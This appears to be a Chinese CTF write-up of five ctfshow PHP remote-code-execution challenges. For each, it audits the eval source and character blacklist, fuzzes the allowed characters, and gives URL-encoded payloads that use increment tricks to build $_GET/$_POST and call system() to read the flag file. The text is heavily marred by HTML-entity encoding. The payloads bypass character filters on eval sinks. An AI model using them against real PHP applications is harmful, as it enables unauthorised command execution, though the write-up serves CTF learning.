ctfshowRCE极限挑战

本周ctfshow的挑战注重点为RCE&＃xff0c;主要利用是&＃xff1a;自增绕过RCE

RCE挑战1

属于简单类型

源码

error_reporting(0);
highlight_file(__FILE__);
$code &＃61; $_POST[&＃39;code&＃39;];
$code &＃61; str_replace("(","括号",$code);
$code &＃61; str_replace(".","点",$code);
eval($code);


发现过滤了(和.&＃xff0c;我们可以利用反引号执行命令 echo输出

code&＃61;echo &＃96;ls /&＃96;;


输出flag

code&＃61;echo &＃96;cat /f1agaaa&＃96;;


RCE挑战2

比较简单的

打开题目 审计源码

error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST[&＃39;ctf_show&＃39;])) {
$ctfshow &＃61; $_POST[&＃39;ctf_show&＃39;];
if (is_string($ctfshow)) {
if (!preg_match("/[a-zA-Z0-9&＃64;#%^&*:{}\-<\?>\"|&＃96;~\\\\]/",$ctfshow)){
eval($ctfshow);
}else{
echo("Are you hacking me AGAIN?");
}
}else{
phpinfo();
}
}


我们跑一下 看看哪些字符没有被过滤


for ($i&＃61;32;$i<127;$i&＃43;&＃43;){
if (!preg_match("/[a-zA-Z0-9&＃64;#%^&*:{}\-<\?>\"|&＃96;~\\\\]/",chr($i))){
echo chr($i)." ";
}
}


结果&＃xff1a;

! $ &＃39; ( ) &＃43; , . / ; &＃61; [ ] _


可以考虑$_绕过&＃xff01;&＃xff08;自增绕过&＃xff09;

编写

$_&＃61;[]._;$__&＃61;$_[&＃39;!&＃39;&＃61;&＃61;&＃39;&＃61;&＃39;];$__&＃43;&＃43;;$__&＃43;&＃43;;$__&＃43;&＃43;;$___&＃61;&＃43;&＃43;$__;&＃43;&＃43;$__;$___&＃61;&＃43;&＃43;$__.$___;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;&＃43;&＃43;$__;$___&＃61;$___.&＃43;&＃43;$__;$_&＃61;&＃39;_&＃39;.$___;($$_[_])($$_[__]);
//相当于 ($_GET[_])($_GET[__]) 使用的时候url编码一下


传入

?_&＃61;system&__&＃61;ls


找flag

POST:
ctf_show&＃61;%24_%3D%5B%5D._%3B%24__%3D%24_%5B&＃39;!&＃39;%3D%3D&＃39;%3D&＃39;%5D%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___%3D%2B%2B%24__%3B%2B%2B%24__%3B%24___%3D%2B%2B%24__.%24___%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%2B%2B%24__%3B%24___%3D%24___.%2B%2B%24__%3B%24_%3D&＃39;_&＃39;.%24___%3B(%24%24_%5B_%5D)(%24%24_%5B__%5D)%3B
GET:
?_&＃61;system&__&＃61;cat /f*


RCE挑战3

限制字符的自增 对于我来说较难

源码

//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势&＃xff0c;太棒啦~。
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST[&＃39;ctf_show&＃39;])) {
$ctfshow &＃61; $_POST[&＃39;ctf_show&＃39;];
if (is_string($ctfshow) && strlen($ctfshow) <&＃61; 105) {
if (!preg_match("/[a-zA-Z2-9!&＃39;&＃64;#%^&*:{}\-<\?>\"|&＃96;~\\\\]/",$ctfshow)){
eval($ctfshow);
}else{
echo("Are you hacking me AGAIN?");
}
}else{
phpinfo();
}
}


fuzz测试什么没有被过滤

for ($i&＃61;32;$i<127;$i&＃43;&＃43;){
if (!preg_match("/[a-zA-Z2-9!&＃39;&＃64;#%^&*:{}\-<\?>\"|&＃96;~\\\\]/",chr($i))){
echo chr($i);
}
}


输出

$()&＃43;,./01;&＃61;[]_


要保证构造payload长度小于105而且还是自增rce

使用A的话构造GET肯定是无法小于105 那么可以尝试构造POST _/_ &＃61;&＃61; NAN

构造的payload

$_&＃61;(_/_._)[0];$_0&＃61;&＃43;&＃43;$_;$_0&＃61;&＃43;&＃43;$_.$_0;&＃43;&＃43;$_;&＃43;&＃43;$_;$_0.&＃61;&＃43;&＃43;$_;$_0.&＃61;&＃43;&＃43;$_;$_&＃61;_.$_0;($$_[0])($$_[1]);


传入参数

POST:
ctf_show&＃61;%24_%3D(_%2F_._)%5B0%5D%3B%24_0%3D%2B%2B%24_%3B%24_0%3D%2B%2B%24_.%24_0%3B%2B%2B%24_%3B%2B%2B%24_%3B%24_0.%3D%2B%2B%24_%3B%24_0.%3D%2B%2B%24_%3B%24_%3D_.%24_0%3B(%24%24_%5B0%5D)(%24%24_%5B1%5D)%3B&0&＃61;system&1&＃61;cat /f1agaaa


RCE挑战4

源码


//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势&＃xff0c;太棒啦~。
error_reporting(0);
highlight_file(__FILE__);
if (isset($_POST[&＃39;ctf_show&＃39;])) {
$ctfshow &＃61; $_POST[&＃39;ctf_show&＃39;];
if (is_string($ctfshow) && strlen($ctfshow) <&＃61; 84) {
if (!preg_match("/[a-zA-Z1-9!&＃39;&＃64;#%^&*:{}\-<\?>\"|&＃96;~\\\\]/",$ctfshow)){
eval($ctfshow);
}else{
echo("Are you hacking me AGAIN?");
}
}else{
phpinfo();
}
}


要求字符小于等于84

fuzz测试&＃xff0c;可用字符

$()&＃43;,./0;&＃61;[]_
$()&＃43;,./;&＃61;[]_


构造

$_&＃61;(_/_._)[0];&＃43;&＃43;$_;$__&＃61;$_.$_&＃43;&＃43;;&＃43;&＃43;$_;&＃43;&＃43;$_;&＃43;&＃43;$_;$__.&＃61;$_&＃43;&＃43;.$_;$_&＃61;_.$__;$$_[_]($$_[0]);
// 分析一下
//1.(_/_._)[0]&＃61;&＃61;N
//$__&＃61;$_.$_&＃43;&＃43;; 此时的$_&＃61;O $_.$_&＃43;&＃43;; 这个顺序是&＃xff08;实验得出来的&＃xff09;&＃xff1a;
// 先使用 后自增 最后使用 $__&＃61;$_.O; -> $_&＃43;&＃43; -> $__&＃61;P.O;


payload

ctf_show&＃61;%24_%3D(_%2F_._)%5B0%5D%3B%2B%2B%24_%3B%24__%3D%24_.%24_%2B%2B%3B%2B%2B%24_%3B%2B%2B%24_%3B%2B%2B%24_%3B%24__.%3D%24_%2B%2B.%24_%3B%24_%3D_.%24__%3B%24%24_%5B_%5D(%24%24_%5B0%5D)%3B&_&＃61;system&0&＃61;nl /f1agaaa


RCE挑战5

源码

highlight_file(__FILE__);
if (isset($_POST[&＃39;ctf_show&＃39;])) {
$ctfshow &＃61; $_POST[&＃39;ctf_show&＃39;];
if (is_string($ctfshow) && strlen($ctfshow) <&＃61; 73) {
if (!preg_match("/[a-zA-Z0-9!&＃39;&＃64;#%^&*:{}\-<\?>\"|&＃96;~\\\\]/",$ctfshow)){
eval($ctfshow);
}else{
echo("Are you hacking me AGAIN?");
}
}else{
phpinfo();
}
}


限制传入的参数长度小于等于73

fuzz测试哪些字符没有被过滤

for ($i&＃61;32;$i<127;$i&＃43;&＃43;){
if (!preg_match("/[a-zA-Z0-9!&＃39;&＃64;#%^&*:{}\-<\?>\"|&＃96;~\\\\]/",chr($i))){
echo chr($i);
}
}
// $()&＃43;,./;&＃61;[]_


构造payload

# 第一种 &＃xff01;&＃xff01;知识点&＃xff01;&＃xff01; 直接使用_POST当做参数
$_&＃61;(_/_._)[_];$_&＃43;&＃43;;$__&＃61;$_.$_&＃43;&＃43;;&＃43;&＃43;$_;&＃43;&＃43;$_;$$_[$_&＃61;_.$__.&＃43;&＃43;$_.&＃43;&＃43;$_]($$_[_]);
第一个参数&＃xff1a;_POST 第二个参数&＃xff1a;_
# 借助ctfshow群里佬的payload tql
# 第二种
# 不可见字符替换 &＃xff01;&＃xff01;知识点&＃xff01;&＃xff01;
$_&＃61;(_/_._)[_];&＃43;&＃43;$_;$a&＃61;$_.$_&＃43;&＃43;;&＃43;&＃43;$_;&＃43;&＃43;$_;$_&＃61;_.$a.&＃43;&＃43;$_.&＃43;&＃43;$_;$$_[_]($$_[a]);
# 转为url后将a改为 %ff $fe 等不可见字符
ctf_show&＃61;$%ff&＃61;_(%ff/%ff)[%ff];$_&＃61;%2b%2b$%ff;$_&＃61;_.%2b%2b$%ff.$_;$%ff%2b%2b;$%ff%2b%2b;$_.&＃61;%2b%2b$%ff.%2b%2b$%ff;$$_[_]($$_[%ff]);&_&＃61;system&%ff&＃61;cat /f1agaaa


另外更有大佬的payload

phpinfo安装了一个扩展gettext&＃xff0c;该扩展支持函数_() ,相当于gettext()&＃xff0c;直接转化为字符串


$a&＃61;_(a/a)[a];//相当于gettext(0/0)[0],得到N
$_&＃61;&＃43;&＃43;$a;//O
$_&＃61;_.&＃43;&＃43;$a.$_;//_PO
$a&＃43;&＃43;;$a&＃43;&＃43;;//R
$_.&＃61;&＃43;&＃43;$a.&＃43;&＃43;$a;//_POST
$$_[a]($$_[_]);//$_POST[a]($_POST[_])